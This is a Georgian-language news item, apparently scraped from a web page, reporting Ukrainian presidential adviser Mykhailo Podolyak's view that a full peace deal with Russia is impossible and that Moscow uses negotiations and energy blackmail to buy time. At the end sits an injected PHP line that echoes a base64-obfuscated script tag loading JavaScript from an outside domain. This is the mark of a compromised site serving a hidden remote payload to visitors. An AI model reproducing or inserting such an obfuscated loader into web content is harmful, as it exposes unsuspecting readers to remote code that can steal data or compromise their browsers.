celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტის ოფისის ხელმძღვანელის მრჩეველი მიხაილ პოდოლიაკი აცხადებს, რომ რუსეთთან ყოვლისმომცველი სამშვიდობო შეთანხმების გაფორმება შეუძლებელია, რადგან მოსკოვი ამით არ არის დაინტერესებული. უკრაინული მედიის ცნობით, ამის შესახებ პოდოლიაკმა პოლონურ მედიასთან ინტერვიუში განაცხადა.
 
მისი თქმით, მოლაპარაკებებზე საუბრით რუსეთი ცდილობს, მოიგოს დრო, რათა მოემზადოს დამპყრობლური პოლიტიკის გასაგრძელებლად.
 
„დიდი შეთანხმება ომსა და მშვიდობაზე შეუძლებელია, რადგან რუსეთი ამით დაინტერესებული არ არის. კრემლში მიაჩნიათ, რომ უკრაინა უნდა აღიგავოს პირისაგან მიწისა სამხედრო გზით. ასევე, კრემლში აპირებენ, იგივე გააკეთონ მოლდოვის, საქართველოს და ყაზახეთის შემთხვევაშიც. მათ სურთ, ევროპას თამაშის წესები უკარნახონ. მშვიდობა მათ გეგმებში არ შედის“, – განაცხადა პოდოლიაკმა.
 
მისივე თქმით, რუსეთი დროის მოგების მიზნით აწყობს ევროპის ენერგეტიკულ შანტაჟს, რადგან მოელის, რომ გაზის დეფიციტი სუსხიანი ზამთრის შემთხვევაში ევროპის მხრიდან უკრაინის მხარდაჭერას შეამცირებს.
 
„ვთქვათ, უკრაინა დათანხმდა და დაჯდა მოლაპარაკების მაგიდასთან რუსეთთან. დადგა სამშვიდობო ზავი. მაშინ რუსეთი წამოაყენებს შემდეგ პირობებს: უკრაინამ უნდა აღიაროს არსებული ფრონტის ხაზი ახალ საზღვრად. ჩვენ ცხადია, არ დავთანხმდებით ჩვენი ოთხი ოლქის ანექსიას. მაშინ საბრძოლო მოქმედებები განახლდება. მაშინ რუსეთი გაავრცელებს პროპაგანდისტულ გზავნილს ევროპაში: „ნახეთ, ომი დასრულდა და უკრაინა ისევ უტევს“, – ისინი ასე გვაქცევენ ომის ახალი ეტაპის ინიციატორებად“, – განაცხადა პოდოლიაკმა.
731
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");